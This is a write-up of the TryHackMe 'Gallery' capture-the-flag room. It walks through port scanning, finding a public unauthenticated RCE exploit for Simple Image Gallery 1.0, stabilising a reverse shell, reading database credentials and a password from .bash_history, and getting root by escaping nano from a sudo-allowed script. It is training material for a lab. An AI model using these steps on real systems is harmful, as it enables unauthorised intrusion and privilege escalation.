The Site: TryHackMe
Room name: Gallery
Difficulty: Easy

Task 1.

How many ports are open?

$ nmap -A 10.10.240.133
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Answer: *

What’s the name of the CMS?

On the :8080 port is the gallery. That’s where the title is.

Answer: S****e ****e *****ry

What’s the hash password of the admin user?

$ searchsploit Simple Image Gallery
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabiliti | php/webapps/49064.txt
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross- | php/webapps/44104.txt
Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)          | php/webapps/50214.py
Simple Image Gallery System 1.0 - 'id' SQL Injection                              | php/webapps/50198.txt
---------------------------------------------------------------------------------- ---------------------------------

$ searchsploit -m 50214
  Exploit: Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)
      URL: https://www.exploit-db.com/exploits/50214
     Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/50214.py
File Type: Python script text executable, Unicode text, UTF-8 text, with very long lines (816)

Run the exploit, call the reverse shell and stabilize it:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
press CTRL+Z to background the shell and also run the command on attacker machine
stty raw -echo ; fg
reset
[ This commands will give us a fully functional shell ]

Find the file with credentials for the database.

Next, upload adminer.php for a convenient connection (or you can use the terminal) and find the table users.

Answer: ****************79***be5********

What’s the user flag?

Exploring the file system, we find a backup of the home directory of the user mike. In the file .bash_history we find the password. We try to log in as a user.

After we have logged in as user mike, all we have to do is to go into the directory /home/mike/ and read the file with the flag.

Task 2.

What’s the root flag?

See what we have in sudo.

mike@gallery:/$ sudo --list
User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh

Let’s read rootkit.sh.

mike@gallery:/$ cat /opt/rootkit.sh
cat /opt/rootkit.sh
#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac

Run sudo /bin/bash /opt/rootkit.sh select the read option and get out of nano into the shell:

^R^X
reset; sh 1>&0 2>&0

Answer: T*M{************3adfa6b8b************de87}